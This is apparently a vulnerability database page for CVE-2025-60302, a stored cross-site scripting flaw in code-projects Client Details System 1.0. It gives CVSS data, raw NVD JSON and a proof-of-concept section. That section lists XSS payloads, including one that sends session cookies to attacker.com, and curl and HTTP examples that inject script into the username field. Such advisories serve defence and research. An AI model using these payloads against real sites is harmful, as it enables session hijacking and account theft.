Security Vulnerability Report
中文
CVE-2025-60302 CVSS 6.1 MEDIUM

CVE-2025-60302

Published: 2025-10-09 16:15:48
Last Modified: 2025-10-29 16:32:51
Source: [email protected]

Description

code-projects Client Details System 1.0 is vulnerable to Cross Site Scripting (XSS). When adding customer information, the client details system fills in malicious JavaScript code in the username field.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Client Details System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60302 PoC: Stored XSS in code-projects Client Details System 1.0 --> <!-- Attack Vector: Inject malicious JavaScript via the username field when adding customer information --> <!-- Step 1: Navigate to the "Add Customer" page --> <!-- Step 2: Fill in the customer form with the following malicious payload in the username field --> <!-- Payload 1: Basic alert script --> <script>alert('XSS-Vulnerability-CVE-2025-60302')</script> <!-- Payload 2: Cookie stealing (for demonstration) --> <script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> <!-- Payload 3: Event-based XSS --> <img src=x onerror=alert(document.cookie)> <!-- Payload 4: SVG-based XSS --> <svg onload=alert(1)> <!-- Step 3: Submit the form to store the malicious payload in the database --> <!-- Step 4: When any user (especially admin) views the customer list or details page, --> <!-- the injected JavaScript will execute in their browser context --> <!-- HTTP Request Example (conceptual) --> <!-- POST /add_customer.php HTTP/1.1 Host: target-host.com Content-Type: application/x-www-form-urlencoded username=<script>alert(document.cookie)</script>&[email protected]&phone=1234567890&address=test --> <!-- cURL command for testing --> <!-- curl -X POST "http://target-host.com/add_customer.php" \ -d "username=<script>alert('XSS')</script>&[email protected]&phone=1234567890&address=test" -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60302", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:47.850", "lastModified": "2025-10-29T16:32:50.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Client Details System 1.0 is vulnerable to Cross Site Scripting (XSS). When adding customer information, the client details system fills in malicious JavaScript code in the username field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BF8DA67D-864D-46F0-A564-02427490562A"}]}]}], "references": [{"url": "http://code-projects.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Chen1-Boop/CVE/blob/main/CVE-2025-60302.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.